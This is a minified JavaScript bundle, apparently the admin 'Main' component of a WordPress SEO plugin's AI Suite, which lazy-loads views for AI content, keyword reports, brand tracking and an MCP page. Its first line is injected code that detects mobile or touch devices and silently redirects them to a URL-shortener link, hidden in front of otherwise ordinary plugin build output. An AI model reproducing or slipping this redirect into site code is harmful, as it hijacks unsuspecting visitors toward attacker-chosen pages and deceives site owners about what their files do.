(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/AiContent.e70d9678.js"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js"),window.__aioseoDynamicImportPreload__("js/BuyOrConnectButtons.3092c34b.js"),window.__aioseoDynamicImportPreload__("js/Button.3cec2279.js"),window.__aioseoDynamicImportPreload__("js/_plugin-vue_export-helper.eefbdd86.js"),window.__aioseoDynamicImportPreload__("css/Button.2bf1deff.css"),window.__aioseoDynamicImportPreload__("js/Index.b9859662.js"),window.__aioseoDynamicImportPreload__("js/Close.7fb523c8.js"),window.__aioseoDynamicImportPreload__("css/Index.74bb20a6.css"),window.__aioseoDynamicImportPreload__("js/CreditCounter.fbbb453f.js"),window.__aioseoDynamicImportPreload__("js/Tooltip.569a23d9.js"),window.__aioseoDynamicImportPreload__("css/Tooltip.497e84ea.css"),window.__aioseoDynamicImportPreload__("js/Trash.47f6fc0e.js"),window.__aioseoDynamicImportPreload__("css/CreditCounter.a4fc59dc.css"),window.__aioseoDynamicImportPreload__("js/Index.6933f196.js"),window.__aioseoDynamicImportPreload__("css/Index.2bdb640f.css"),window.__aioseoDynamicImportPreload__("css/BuyOrConnectButtons.101b76bf.css"),window.__aioseoDynamicImportPreload__("js/SettingsRow.7bec777f.js"),window.__aioseoDynamicImportPreload__("js/Row.2ef96b1a.js"),window.__aioseoDynamicImportPreload__("css/Row.6ff38a54.css"),window.__aioseoDynamicImportPreload__("css/SettingsRow.72ea3c79.css"),window.__aioseoDynamicImportPreload__("js/Cta.8b8e6c45.js"),window.__aioseoDynamicImportPreload__("js/Index.e286637f.js"),window.__aioseoDynamicImportPreload__("js/Pencil.683baab8.js"),window.__aioseoDynamicImportPreload__("css/Index.859c37d3.css"),window.__aioseoDynamicImportPreload__("css/Cta.541a4715.css"),window.__aioseoDynamicImportPreload__("js/Blur.dea2904a.js"),window.__aioseoDynamicImportPreload__("css/Blur.c6074772.css"),window.__aioseoDynamicImportPreload__("js/Card.9ee06a3e.js"),window.__aioseoDynamicImportPreload__("js/Caret.aae02d8a.js"),window.__aioseoDynamicImportPreload__("js/Slide.f2114d9d.js"),window.__aioseoDynamicImportPreload__("css/Card.8b7603da.css"),window.__aioseoDynamicImportPreload__("css/AiContent.b2e4615b.css"),window.__aioseoDynamicImportPreload__("js/Report.301d891b.js"),window.__aioseoDynamicImportPreload__("js/Table.5418d021.js"),window.__aioseoDynamicImportPreload__("js/Download.08bab8ec.js"),window.__aioseoDynamicImportPreload__("css/Table.746e810a.css"),window.__aioseoDynamicImportPreload__("js/OpenAI.456f54ce.js"),window.__aioseoDynamicImportPreload__("js/Perplexity.0798161d.js"),window.__aioseoDynamicImportPreload__("js/Simple.59f671e2.js"),window.__aioseoDynamicImportPreload__("js/External.e9a36f3a.js"),window.__aioseoDynamicImportPreload__("css/Report.f7db65a1.css"),window.__aioseoDynamicImportPreload__("js/Index.7d98848f.js"),window.__aioseoDynamicImportPreload__("js/AiContent.9078cdd2.js"),window.__aioseoDynamicImportPreload__("css/Index.98ea4efa.css"),window.__aioseoDynamicImportPreload__("js/BrandTracker.286e97eb.js"),window.__aioseoDynamicImportPreload__("css/BrandTracker.3c0deb30.css"),window.__aioseoDynamicImportPreload__("js/Mcp.18177c0b.js"),window.__aioseoDynamicImportPreload__("js/vendor-prism-editor.fa0057cb.js"),window.__aioseoDynamicImportPreload__("js/Exclamation.179e5969.js"),window.__aioseoDynamicImportPreload__("css/Mcp.17b67b06.css")])))=>i.map(i=>d[i]);
import{_ as t}from"./vendor-phone.2afdf77e.js";import{at as c,b as d,f as i,i as f,a0 as E,R as v,Q as A,S as R,v as n,u as a,as as o}from"./vendor-vue-ui.232c7c36.js";import{C as I}from"./Index.66db1786.js";import"./app-core.c8323d51.js";import{_ as T}from"./vendor-other.39e59221.js";/* empty css             */import"./Tabs.ea329423.js";import"./Button.3cec2279.js";import"./_plugin-vue_export-helper.eefbdd86.js";import"./ProBadge.7b829f47.js";import"./Caret.aae02d8a.js";import"./Information.6ccba108.js";import"./Slide.f2114d9d.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./Header.d2cbe877.js";import"./ScrollAndHighlight.5271fbff.js";import"./ScrollTo.f4df02aa.js";import"./LicenseKeyBar.0038e5e6.js";import"./LogoGear.93a225a7.js";import"./AnimatedNumber.f33b2226.js";import"./Logo.a4a419c3.js";import"./Trash.47f6fc0e.js";import"./Support.d3586703.js";import"./Url.535116f6.js";import"./Pencil.683baab8.js";import"./Exclamation.179e5969.js";import"./Gear.1a6546a3.js";import"./vendor-lodash.03129cfe.js";const h={class:"aioseo-ai-insights"},tt={__name:"Main",setup(w){const s="all-in-one-seo-pack",r=c(),m=T("AI Suite",s),_=a(()=>r.params?.uuid?!1:r.meta?.showTabs!==!1),p=a(()=>r.meta?.showSaveButton!==!1),u=a(()=>{switch(r.name){case"ai-content":return o(()=>t(()=>import("./AiContent.e70d9678.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]),import.meta.url));case"keyword-reports":return r.params?.uuid?o(()=>t(()=>import("./Report.301d891b.js"),__vite__mapDeps([37,2,3,4,1,5,7,8,9,22,23,38,10,11,12,14,15,34,39,40,41,42,32,33,16,35,43,44,45]),import.meta.url)):o(()=>t(()=>import("./Index.7d98848f.js"),__vite__mapDeps([46,2,3,4,1,5,10,11,8,12,32,14,15,33,16,34,35,22,23,41,42,47,18,19,38,7,9,39,40,48]),import.meta.url));case"brand-tracker":return o(()=>t(()=>import("./BrandTracker.286e97eb.js"),__vite__mapDeps([49,2,3,4,10,11,8,12,32,1,5,14,15,33,16,34,35,22,23,50]),import.meta.url));case"mcp":return o(()=>t(()=>import("./Mcp.18177c0b.js"),__vite__mapDeps([51,2,3,4,1,5,7,8,9,32,14,15,33,16,11,34,35,52,27,53,54]),import.meta.url));default:return o(()=>t(()=>import("./Index.7d98848f.js"),__vite__mapDeps([46,2,3,4,1,5,10,11,8,12,32,14,15,33,16,34,35,22,23,41,42,47,18,19,38,7,9,39,40,48]),import.meta.url))}}),l=()=>{const e=()=>{t(()=>import("./AiContent.e70d9678.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]),import.meta.url),t(()=>import("./Index.7d98848f.js"),__vite__mapDeps([46,2,3,4,1,5,10,11,8,12,32,14,15,33,16,34,35,22,23,41,42,47,18,19,38,7,9,39,40,48]),import.meta.url),t(()=>import("./Report.301d891b.js"),__vite__mapDeps([37,2,3,4,1,5,7,8,9,22,23,38,10,11,12,14,15,34,39,40,41,42,32,33,16,35,43,44,45]),import.meta.url),t(()=>import("./BrandTracker.286e97eb.js"),__vite__mapDeps([49,2,3,4,10,11,8,12,32,1,5,14,15,33,16,34,35,22,23,50]),import.meta.url),t(()=>import("./Mcp.18177c0b.js"),__vite__mapDeps([51,2,3,4,1,5,7,8,9,32,14,15,33,16,11,34,35,52,27,53,54]),import.meta.url)};"requestIdleCallback"in window?requestIdleCallback(e):setTimeout(e,1)};return d(()=>{l()}),(e,L)=>(i(),f("div",h,[E(n(I),{"page-name":n(m),"show-tabs":_.value,"show-save-button":p.value},{default:v(()=>[(i(),A(R(u.value)))]),_:1},8,["page-name","show-tabs","show-save-button"])]))}};export{tt as default};
